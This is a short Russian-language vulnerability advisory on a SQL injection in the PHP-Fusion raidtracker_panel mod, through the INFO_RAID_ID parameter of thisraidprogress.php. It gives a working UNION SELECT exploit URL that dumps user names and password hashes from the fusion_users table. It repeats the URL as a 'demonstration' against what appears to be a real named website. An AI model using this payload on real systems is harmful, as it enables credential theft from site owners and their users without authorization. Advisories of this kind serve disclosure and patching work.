Программа: PHP-Fusion Mod raidtracker_panel

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «INFO_RAID_ID» сценарием
thisraidprogress.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

http://www.xxxxxxx.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=
-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users—

Демонстрация:

http://differenceguild.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=
-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users—



Оставить мнение